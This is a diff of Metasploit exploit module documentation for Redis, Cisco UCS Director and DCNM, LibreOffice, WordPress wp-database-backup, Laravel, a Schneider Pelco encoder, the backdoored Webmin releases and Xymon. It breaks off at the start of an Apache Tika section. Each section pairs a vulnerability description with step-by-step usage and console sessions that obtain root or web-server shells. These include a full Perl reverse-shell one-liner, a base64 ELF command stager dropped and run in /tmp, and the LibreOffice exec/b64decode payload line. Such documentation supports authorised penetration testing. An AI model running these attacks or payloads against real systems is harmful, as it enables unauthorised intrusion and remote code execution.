+[*] Sending stage (985320 bytes) to 192.168.0.80
+[*] Meterpreter session 2 opened (192.168.0.50:13371 -> 192.168.0.80:45562) at 2019-07-07 23:46:37 +0100
+[+] Deleted /tmp/eMhzFtUYGQ
+[+] Check session 2, you should have a root shell!
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : 192.168.0.80
+OS           : Ubuntu 18.04 (Linux 4.18.0-25-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter >
+```
@@ -0,0 +1,171 @@
+## Description
+
+This module exploits an unauthenticated code execution vulnerability in Redis 4.x and 5.x
+
+## Vulnerable Application
+
+**Vulnerable Application Link**
+
+- Official Docker Images
+
+https://hub.docker.com/_/redis/
+
+## Vulnerable Application Installation Setup.
+
+```
+docker pull redis
+docker run -p 6379:6379 -d --name redis_slave redis
+```
+
+## Options   
+
+- CUSTOM
+
+IF `CUSTOM` set to true, this exploit would generate a source code file, and compile it to a redis module file during running, which is more undetectable. 
+It's only worked on linux system.
+
+For other scenarios, such as lack of gcc, or others opreate systems, framework could not compile the source for sucessful exploit, it uses the pre-compiled redis module to accomplish this exploit.
+
+
+## Verification Steps
+
+### set CUSTOM true (available only on linux)
+
+```
+msf5 exploit(multi/redis/redis_unanth_rce) > options
+
+Module options (exploit/multi/redis/redis_unanth_rce):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   CUSTOM    true             yes       Whether compile payload file during exploiting
+   PASSWORD  foobared         no        Redis password for authentication test
+   RHOSTS    127.0.0.1        yes       The target address range or CIDR identifier
+   RPORT     6379             yes       The target port (TCP)
+   SRVHOST   172.17.0.1       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT   6666             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.17.0.1       yes       The listen address (an interface may be specified)
+   LPORT  8080             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf5 exploit(multi/redis/redis_unanth_rce) > set verbose false
+verbose => false
+msf5 exploit(multi/redis/redis_unanth_rce) > exploit
+
+[*] Started reverse TCP handler on 172.17.0.1:8080 
+[*] 127.0.0.1:6379        - Compile redis module extension file
+[+] 127.0.0.1:6379        - Payload  generate successful! 
+[*] 127.0.0.1:6379        - Listening on 172.17.0.1:6666
+[*] 127.0.0.1:6379        - Rogue server close...
+[*] 127.0.0.1:6379        - Sending command to trigger payload.
+[*] Sending stage (3021284 bytes) to 172.17.0.2
+[*] Meterpreter session 4 opened (172.17.0.1:8080 -> 172.17.0.2:49556) at 2019-07-19 11:58:52 -0400
+[!] 127.0.0.1:6379        - This exploit may require manual cleanup of './vxwqrg.so' on the target
+
+meterpreter > getuid
+Server username: uid=999, gid=999, euid=999, egid=999
+meterpreter > 
+
+```
+
+### Set CUSTOM false (available on all system)
+
+```
+msf5 > use exploit/linux/redis/redis_unauth_exec
+msf5 exploit(linux/redis/redis_unauth_exec) > options
+
+Module options (exploit/linux/redis/redis_unauth_exec):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   CUSTOM    false            yes       Whether compile payload file during exploiting
+   PASSWORD  foobared         no        Redis password for authentication test
+   RHOSTS                     yes       The target address range or CIDR identifier
+   RPORT     6379             yes       The target port (TCP)
+   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT   6379             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf5 exploit(linux/redis/redis_unauth_exec) > set rhosts 172.16.6.226
+rhosts => 172.16.6.226
+msf5 exploit(linux/redis/redis_unauth_exec) > set srvhost 172.16.6.1
+srvhost => 172.16.6.1
+msf5 exploit(linux/redis/redis_unauth_exec) > set srvport 6666
+srvport => 6666
+msf5 exploit(linux/redis/redis_unauth_exec) > set lhost 172.16.6.1
+lhost => 172.16.6.1
+msf5 exploit(linux/redis/redis_unauth_exec) > set lport 9999
+lport => 9999
+msf5 exploit(linux/redis/redis_unauth_exec) > options
+
+Module options (exploit/linux/redis/redis_unauth_exec):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   CUSTOM    true             yes       Whether compile payload file during exploiting
+   PASSWORD  foobared         no        Redis password for authentication test
+   RHOSTS    172.16.6.226     yes       The target address range or CIDR identifier
+   RPORT     6379             yes       The target port (TCP)
+   SRVHOST   172.16.6.1       yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT   6666             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.16.6.1       yes       The listen address (an interface may be specified)
+   LPORT  9999             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf5 exploit(linux/redis/redis_unauth_exec) > exploit
+
+[*] Started reverse TCP handler on 172.16.6.1:9999
+[*] 172.16.6.226:6379     - Listening on 172.16.6.1:6666
+[*] 172.16.6.226:6379     - Rogue server close...
+[*] 172.16.6.226:6379     - Sending command to trigger payload.
+[*] Sending stage (3021284 bytes) to 172.16.6.226
+[*] Meterpreter session 3 opened (172.16.6.1:9999 -> 172.16.6.226:50362) at 2019-07-19 23:53:13 +0800
+[*] 172.16.6.226:6379     - Command Stager progress - 100.00% done (819/819 bytes)
+[!] 172.16.6.226:6379     - This exploit may require manual cleanup of './wfuujx.so' on the target
+
+meterpreter > getuid
+Server username: uid=999, gid=999, euid=999, egid=999
+meterpreter > getpid
+Current pid: 173
+```
@@ -0,0 +1,50 @@
+## Intro
+
+This module abuses a known default password on Cisco UCS Director. The 'scpuser'
+has the password of 'scpuser', and allows an attacker to login to the virtual appliance
+via SSH (aka CVE-2019-1935).
+
+This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
+Note that Cisco also mentions in their advisory that their IMC Supervisor and
+UCS Director Express are also affected by these vulnerabilities, but this module
+was not tested with those products.
+
+
+## Author and discoverer
+
+Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
+
+
+## References
+
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred
+https://seclists.org/fulldisclosure/2019/Aug/36
+https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt
+
+
+## Usage
+
+Setup RHOST and run it!
+
+```
+msf5 exploit(linux/http/cisco_ucs_rce) > use exploit/linux/ssh/cisco_ucs_scpuser
+msf5 exploit(linux/ssh/cisco_ucs_scpuser) > set rhost 10.9.8.121
+rhost => 10.9.8.121
+msf5 exploit(linux/ssh/cisco_ucs_scpuser) > set lhost 10.9.8.1
+lhost => 10.9.8.1
+msf5 exploit(linux/ssh/cisco_ucs_scpuser) > run
+
+[*] 10.9.8.121:22 - Attempt to login to the Cisco appliance...
+[+] 10.9.8.121:22 - Login Successful (scpuser:scpuser)
+
+[*] Found shell.
+[*] Command shell session 1 opened (10.9.8.1:38113 -> 10.9.8.121:22) at 2019-08-29 22:27:42 +0700
+
+whoami
+scpuser
+^C
+Abort session 1? [y/N]  y
+""
+
+[*] 10.9.8.121 - Command shell session 1 closed.  Reason: User exit
+```
@@ -0,0 +1,100 @@
+## Description
+
+  This module exploits CVE-2019-9848, CVE-2019-9851 and is based on the module exploiting CVE-2018-16858, written by Shelby Pace.
+
+  LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. 
+
+  By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. 
+
+  This module generates an ODT file with a global dom loaded event that, when triggered, will execute any arbitrary python code and the metasploit payload. LibreLogo executes the python code stored on the text part of the document.
+
+  The generated document file contains a one-liner python code that executes the python payload generated by metasploit : 
+
+  ```python
+  exec(eval(str(__import__('base64').b64decode('#{b64_py_code}'))))
+  ```
+
+  To avoid any python error, the `h1` title written in the document is a python comment `#`.
+  
+  Thanks to Shelby Pace, this module is now platform-independent.
+
+## Vulnerable Application
+
+  LibreOffice version 6.2.5 and prior.
+
+  This module has been tested successfully with:
+
+  * LibreOffice 6.2.4 on Windows 7
+  * LibreOffice 6.2.4 on Debian 9.9
+  * LibreOffice 6.2.5 on Debian 9.9
+  * LibreOffice 6.2.5 on Windows 7
+  * LibreOffice 6.2.5 on Windows 10
+  * LibreOffice 6.2.5 on Ubuntu 18.04
+  * LibreOffice 6.2.5 on macOS 10.13.6
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/fileformat/libreoffice_logo_exec```
+  4. Do: ```set LHOST <ip>```
+  5. Do: ```set LPORT <port>```
+  6. Do: ```run```
+  7. Move the generated file to the targets
+  8. Start a handler
+  9. Open the file with a vulnerable version of LibreOffice
+ 10. You should get a shell.
+
+## Scenarios
+
+### LibreOffice 6.2.5 on Windows 10
+
+  ```
+  msf5 exploit(multi/handler) > run
+  
+  [*] Started reverse TCP handler on 192.168.56.4:4444 
+  [*] Sending stage (53755 bytes) to 192.168.56.3
+  [*] Meterpreter session 3 opened (192.168.56.4:4444 -> 192.168.56.3:51259) at 2019-08-18 08:57:20 -0400
+  
+  meterpreter > sysinfo
+  Computer        : LL
+  OS              : Windows 10 (Build 17134)
+  Architecture    : x64
+  System Language : fr_FR
+  Meterpreter     : python/windows
+  ```
+
+### LibreOffice 6.2.5 on Ubuntu 18.04
+  ```
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [*] Sending stage (53755 bytes) to 192.168.37.137
+  [*] Meterpreter session 3 opened (192.168.37.1:4444 -> 192.168.37.137:46668) at 2019-08-16 15:38:54 -0500
+
+  meterpreter > sysinfo
+  Computer        : ubuntu
+  OS              : Linux 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019
+  Architecture    : x64
+  System Language : en_US
+  Meterpreter     : python/linux
+  ```
+  
+### LibreOffice 6.2.5 on macOS 10.13.6
+
+  ```
+  msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
+  payload => python/meterpreter/reverse_tcp
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 192.168.56.4:4444 
+  [*] Sending stage (53755 bytes) to 192.168.56.2
+  [*] Meterpreter session 1 opened (192.168.56.4:4444 -> 192.168.56.2:50795) at 2019-08-18 08:17:43 -0400
+
+  meterpreter > sysinfo
+  Computer        : MBP.local
+  OS              : Darwin 17
+  Architecture    : x64
+  System Language : en_GB
+  Meterpreter     : python/osx
+  ```
@@ -0,0 +1,50 @@
+## Intro
+
+Cisco Data Center Network Manager exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
+An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
+directory and achieve remote code execution as root.
+
+This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
+versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
+directory for the WAR file upload.
+
+The module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
+work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
+(see References to understand why).
+
+
+## Author and discoverer
+
+Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security
+
+
+## References
+
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex
+https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex
+https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb
+https://seclists.org/fulldisclosure/2019/Jul/7
+
+
+## Usage
+
+Setup RHOST, LHOST, LPORT, run it and sit back!
+
+```
+[*] Started reverse TCP handler on 10.75.1.1:4444
+[+] 10.75.1.40:443 - Detected DCNM 11.1(1)
+[*] 10.75.1.40:443 - No authentication required, ready to exploit!
+[+] 10.75.1.40:443 - Obtain WAR path from logs: /usr/local/cisco/dcm/wildfly-10.1.0.Final/standalone/sandeployments
+[*] 10.75.1.40:443 - Uploading payload...
+[+] 10.75.1.40:443 - WAR uploaded, waiting a few seconds for deployment...
+[*] 10.75.1.40:443 - Executing payload...
+[*] Sending stage (53867 bytes) to 10.75.1.40
+[*] Meterpreter session 1 opened (10.75.1.1:4444 -> 10.75.1.40:60592) at 2019-08-29 12:41:49 +0700
+
+meterpreter > getuid
+Server username: root
+meterpreter > exit
+[*] Shutting down Meterpreter...
+[*] 10.75.1.40 - Meterpreter session 1 closed.  Reason: User exit
+```
@@ -0,0 +1,103 @@
+## Description
+
+  There exists a command injection vulnerability in the Wordpress plugin `wp-database-backup` for versions < 5.2.
+  
+  For the backup functionality, the plugin generates a `mysqldump` command to execute. The user can choose specific
+  tables to exclude from the backup by setting the `wp_db_exclude_table` parameter in a POST request to the
+  `wp-database-backup` page. The names of the excluded tables are included in the `mysqldump` command unsanitized.
+
+  Arbitrary commands injected through the `wp_db_exclude_table` parameter are executed each time the functionality
+  for creating a new database backup are run.
+
+## Vulnerable Application
+
+  The `wp-database-backup` plugin < `v5.2`. The plugin can be found [here](https://wordpress.org/plugins/wp-database-backup/).
+  Older versions of the software can be found via the `advanced` view on the plugin's main page.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/http/wp_db_backup_rce```
+  4. Do: ```set RHOSTS <ip>```
+  5. Do: ```set USERNAME <user>```
+  6. Do: ```set PASSWORD <password>```
+  7. Do: ```run```
+  8. You should get a shell.
+
+## Scenarios
+
+### Tested on wp-database-backup v4.6.5 running Wordpress 5.1 on Ubuntu 18.04
+
+  ```
+  msf5 exploit(multi/http/wp_db_backup_rce) > set target 1
+  target => 1
+  msf5 exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.147
+  rhosts => 192.168.37.147
+  msf5 exploit(multi/http/wp_db_backup_rce) > set payload linux/x86/meterpreter/reverse_tcp
+  payload => linux/x86/meterpreter/reverse_tcp
+  msf5 exploit(multi/http/wp_db_backup_rce) > check
+
+  [*] Version of wp-database-backup detected: 4.6
+  [*] 192.168.37.147:80 - The target appears to be vulnerable.
+  msf5 exploit(multi/http/wp_db_backup_rce) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [+] Reached the wp-database-backup settings page
+  [+] Successfully added payload as an excluded table
+  [*] Sending stage (985320 bytes) to 192.168.37.147
+  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.147:48398) at 2019-06-25 11:05:27 -0500
+  [+] Successfully created a backup of the database
+  [+] Successfully deleted the database backup
+  [+] Successfully deleted the payload from the excluded tables list
+
+  meterpreter > getuid
+  Server username: uid=33, gid=33, euid=33, egid=33
+  meterpreter > sysinfo
+  Computer     : 192.168.37.147
+  OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  ```
+
+### Tested on wp-database-backup v4.6.5 running Wordpress 5.2 on Windows 10
+
+  ```
+  msf5 > use exploit/multi/http/wp_db_backup_rce 
+  msf5 exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.144
+  rhosts => 192.168.37.144
+  msf5 exploit(multi/http/wp_db_backup_rce) > set payload windows/x64/meterpreter/reverse_tcp
+  payload => windows/x64/meterpreter/reverse_tcp
+  msf5 exploit(multi/http/wp_db_backup_rce) > set username user
+  username => user
+  msf5 exploit(multi/http/wp_db_backup_rce) > set password password
+  password => password
+  msf5 exploit(multi/http/wp_db_backup_rce) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(multi/http/wp_db_backup_rce) > check
+
+  [*] Version of wp-database-backup detected: 4.6
+  [*] 192.168.37.144:80 - The target appears to be vulnerable.
+  msf5 exploit(multi/http/wp_db_backup_rce) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444 
+  [+] Reached the wp-database-backup settings page
+  [+] Successfully added payload as an excluded table
+  [*] Sending stage (206403 bytes) to 192.168.37.144
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.144:49844) at 2019-06-25 11:01:22 -0500
+  [+] Successfully created a backup of the database
+  [+] Successfully deleted the database backup
+  [+] Successfully deleted the payload from the excluded tables list
+
+  meterpreter > getuid
+  Server username: DESKTOP-RTVVNST\Shelby Pace
+  meterpreter > sysinfo
+  Computer        : DESKTOP-RTVVNST
+  OS              : Windows 10 (Build 16299).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x64/windows
+  ```
@@ -0,0 +1,48 @@
+## Vulnerable Application
+
+[Laravel](https://laravel.com/) is an actively-maintained PHP Framework web development suite.
+
+This module exploits an unauthenticated vulnerability that allows for PHP object deserialization and command execution.
+The vulnerability was discovered by [Ståle Pettersen](https://github.com/kozmic/laravel-poc-CVE-2018-15133)
+
+The module may also uses CVE-2017-16894 to check for a leaked key. Another leaked key method is available which may not be known and perhaps 0day?
+
+### Setting up Laravel on Debian
+
+- `git clone https://github.com/kozmic/laravel-poc-CVE-2018-15133`
+- Edit Dockerfile and change `sed -i -e 's/5.7.\*/5.6.29/g'` to `sed -i -e 's/5.8.\*/5.6.29/g'` (needs to be 5.8 as 5.7 is removed from mirror)
+- `docker build -t laravel-poc-cve-2018-15133 .`
+- `docker run -d -p 8000:8000 laravel-poc-cve-2018-15133`
+
+## Verification Steps
+
+- `./msfconsole`
+- `use exploits/unix/http/laravel_token_unserialize_exec`
+- `set RHOST <rhost>`
+- `set RPORT <rport>`
+- `set APP_KEY <base64_string>`
+- `check`
+- `exploit`
+
+## Scenarios
+
+```
+msf5 exploit(unix/http/laravel_token_unserialize_exec) > check
+
+[*] 172.22.222.112:8000 - APP_KEY not set. Will try to find it...
+[*] 172.22.222.112:8000 - Checking for CVE-2017-16894 .env information leak
+[+] 172.22.222.112:8000 - APP_KEY Found via Laravel Framework error information leak: uV1jO3mpnhtdvcsSi1EIUVtSMBXeAvWtL3lmNwx7n9Q=
+[+] 172.22.222.112:8000 - The target is vulnerable.
+msf5 exploit(unix/http/laravel_token_unserialize_exec) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] 172.22.222.112:8000 - APP_KEY not set. Will try to find it...
+[*] 172.22.222.112:8000 - Checking for CVE-2017-16894 .env information leak
+[+] 172.22.222.112:8000 - APP_KEY Found via Laravel Framework error information leak: uV1jO3mpnhtdvcsSi1EIUVtSMBXeAvWtL3lmNwx7n9Q=
+[*] Command shell session 36 opened (172.22.222.136:4444 -> 172.22.222.112:49506) at 2019-07-12 08:16:05 -0500
+
+uname -a
+Linux 03cc598c00af 4.18.0-25-generic #26~18.04.1-Ubuntu SMP Thu Jun 27 07:28:31 UTC 2019 x86_64 GNU/Linux
+whoami
+root
+```
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+Schneider Electric Pelco NET55XX Encoder (CVE 2019-6814)
+
+Adding Schneider Electric Pelco NET55XX module affecting NET55XX versions (NET5501, NET5501-I, NET5501-XT, NET5504, NET5500,NET5516,NET550).
+This module exploits an inadequate access control vulnerability creating a malicious JSON request to the `webUI` encoder, thus allowing the SSH service to be enabled and changing the root password.
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/linux/http/schneider_electric_net55xx_encoder`
+- [ ] `set RHOSTS [rhosts]`
+- [ ] `set RPORT [rport]`
+- [ ] `set NEW_PASSWORD [new password]`
+- [ ] `exploit`
+- [ ] Verify you get a root shell
+
+## Options
+
+This module can be as simple as setting the `RHOST` and `NEW_PASSWORD` option, and you're ready to go.
+
+**NEW_PASSWORD**  
+
+You should set a new SSH password to the vulnerable device.
+
+## Scenarios
+
+**Schneider Electric Pelco Encoder NET5501-XT**
+
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RHOSTS 192.168.34.2
+RHOSTS  => 192.168.34.2
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set RPORT 80
+RPORT  => 80
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > set NEW_PASSWORD msfrapid7
+NEW_PASSWORD => msfrapid7
+msf5 exploit(unix/http/schneider_electric_net55xx_encoder) > run
+
+[] 192.168.34.2:22 - Attempt to start a SSH connection...
+[] 192.168.34.2:80 - Attempt to change the root password...
+[+] 192.168.34.2:80 - Successfully changed the root password...
+[+] 192.168.34.2:22 - Session established
+[] Found shell.
+[] Command shell session 1 opened (192.168.34.3:37033 -> 192.168.34.2:22) at 2019-07-03 10:57:07 -0400
+
+uname -a;id
+Linux NET5501-XT-K61200103 2.6.37 #1 PREEMPT Fri Aug 8 04:33:08 KST 2014 armv7l unknown
+uid=0(root) gid=0(root) groups=0(root)
@@ -0,0 +1,123 @@
+## Intro
+
+This module exploits a backdoor in Webmin versions 1.890 through 1.920.
+Only the SourceForge downloads were backdoored, but they are listed as
+official downloads on the project's site.
+
+Unknown attacker(s) inserted Perl `qx` statements into the build server's
+source code on two separate occasions: once in April 2018, introducing
+the backdoor in the 1.890 release, and in July 2018, reintroducing the
+backdoor in releases 1.900 through 1.920.
+
+Only version 1.890 is exploitable in the default install. Later affected
+versions require the expired password changing feature to be enabled.
+
+## Analysis
+
+The backdoored code can compared across space and time with `diff3(1)`.
+
+```
+wvu@kharak:~/Downloads$ diff3 webmin-1.{890,930,920}/password_change.cgi
+====2
+1:1c
+3:1c
+  #!/usr/bin/perl
+2:1c
+  #!/usr/local/bin/perl
+====1
+1:12c
+  $in{'expired'} eq '' || die $text{'password_expired'},qx/$in{'expired'}/;
+2:12c
+3:12c
+  $miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";
+====3
+1:40c
+2:40c
+  	$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
+3:40c
+  	$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
+====3
+1:200c
+2:200c
+  # Show ok page
+3:200c
+
+wvu@kharak:~/Downloads$
+```
+
+## Setup
+
+1. `wget https://prdownloads.sourceforge.net/webadmin/webmin-1.890.tar.gz`
+2. `tar xf webmin-1.890.tar.gz`
+3. `cd webmin-1.890`
+4. `./setup.sh`
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   Automatic (Unix In-Memory)
+1   Automatic (Linux Dropper)
+```
+
+## Options
+
+**RPORT**
+
+Set this to the Webmin port. The default is 10000.
+
+**TARGETURI**
+
+Set this to the Webmin base path. The default is `/`.
+
+**ForceExploit**
+
+Set this to `true` to override the `check` result during exploitation.
+
+## Usage
+
+```
+msf5 exploit(unix/webapp/webmin_backdoor) > run
+
+[*] Started reverse TCP handler on 172.28.128.1:4444
+[*] Webmin 1.890 detected
+[+] Webmin 1.890 is a supported target
+[+] Webmin executed a benign check command
+[*] Configuring Automatic (Unix In-Memory) target
+[*] Sending cmd/unix/reverse_perl command payload
+[*] Generated command payload: perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"172.28.128.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
+[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.5:58374) at 2019-08-21 16:49:24 -0500
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+^Z
+Background session 1? [y/N]  y
+msf5 exploit(unix/webapp/webmin_backdoor) > set target 1
+target => 1
+msf5 exploit(unix/webapp/webmin_backdoor) > run
+
+[*] Started reverse TCP handler on 172.28.128.1:4444
+[*] Webmin 1.890 detected
+[+] Webmin 1.890 is a supported target
+[+] Webmin executed a benign check command
+[*] Configuring Automatic (Linux Dropper) target
+[*] Sending linux/x64/meterpreter/reverse_tcp command stager
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/FgFBP.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tDGmH' < '/tmp/FgFBP.b64' ; chmod +x '/tmp/tDGmH' ; '/tmp/tDGmH' ; rm -f '/tmp/tDGmH' ; rm -f '/tmp/FgFBP.b64'"]
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3021284 bytes) to 172.28.128.5
+[*] Meterpreter session 2 opened (172.28.128.1:4444 -> 172.28.128.5:58376) at 2019-08-21 16:49:33 -0500
+[*] Command Stager progress - 100.00% done (819/819 bytes)
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : 10.0.2.15
+OS           : Ubuntu 16.04 (Linux 4.4.0-141-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,102 @@
+## Description
+
+  This module exploits a command injection vulnerability in Xymon
+  versions before 4.3.25 which allows authenticated users
+  to execute arbitrary operating system commands as the web
+  server user.
+
+  When adding a new user to the system via the web interface with
+  `useradm.sh`, the user's username and password are passed to
+  `htpasswd` in a call to `system()` without validation.
+
+
+## Vulnerable Software
+
+  [Xymon](http://xymon.sourceforge.net/) is a system for monitoring servers and networks.
+
+  This module has been tested successfully on:
+
+  * Xymon version 4.3.10 on Debian 6.
+
+  Xymon packages are available in software repositories for various Linux distributions :
+
+  ```
+  sudo apt-get install xymon
+  ```
+
+  Refer to http://xymon.sourceforge.net/xymon/help/install.html for more information.
+
+  A Xymon virtual appliance is also available :
+
+  * https://sourceforge.net/projects/xymon/files/Xymon/4.3.10/VM/
+
+  To enable authentication via the web interace, add a user to `/etc/xymon/xymonpasswd` :
+
+  ```
+  htpasswd /etc/xymon/xymonpasswd <username>
+  ```
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/xymon_useradm_cmd_exec`
+  3. Do: `set rhosts <IP>`
+  4. Do: `set username <username>`
+  5. Do: `set password <password>`
+  6. Do: `run`
+  7. You should get a new session
+
+
+## Options
+
+  **TARGETURI**
+
+  The base path to Xymon secure CGI directory (default: `/xymon-seccgi/`)
+
+  **USERNAME**
+
+  The username for Xymon
+
+  **PASSWORD**
+
+  The password for Xymon
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/unix/webapp/xymon_useradm_cmd_exec 
+  msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set rhosts xymon.local
+  rhosts => xymon.local
+  msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set username admin
+  username => admin
+  msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set password password
+  password => password
+  msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > set verbose true
+  verbose => true
+  msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > check
+
+  [*] 10.1.1.132:80 - Xymon version 4.3.10
+  [*] 10.1.1.132:80 - The target appears to be vulnerable.
+  msf5 exploit(unix/webapp/xymon_useradm_cmd_exec) > run
+
+  [*] Started reverse TCP handler on 10.1.1.170:4444 
+  [*] 10.1.1.132:80 - Xymon version 4.3.10
+  [+] 10.1.1.132:80 - Payload sent successfully
+  [*] Command shell session 1 opened (10.1.1.170:4444 -> 10.1.1.132:47682) at 2019-07-02 09:43:13 -0400
+
+  id
+  uid=33(www-data) gid=33(www-data) groups=33(www-data)
+  pwd
+  /usr/lib/xymon/cgi-secure
+  ls
+  ackinfo.sh
+  acknowledge.sh
+  criticaleditor.sh
+  enadis.sh
+  useradm.sh
+  uname -a
+  Linux xymon 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686 GNU/Linux
+  ```
+
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+  This module works against Windows installations of Apache Tika 1.15-1.17, and was successfully tested on
+  1.15-1.17.  Apache Tika can be downloaded from [here](https://archive.apache.org/dist/tika/), and requires Java to be installed.
+  While the vulnerability is reported in more versions, exploitation was only successful against > 1.14 when jp2 was added as per
+  [this comment](https://github.com/rapid7/metasploit-framework/pull/11653#issuecomment-516159557).
+
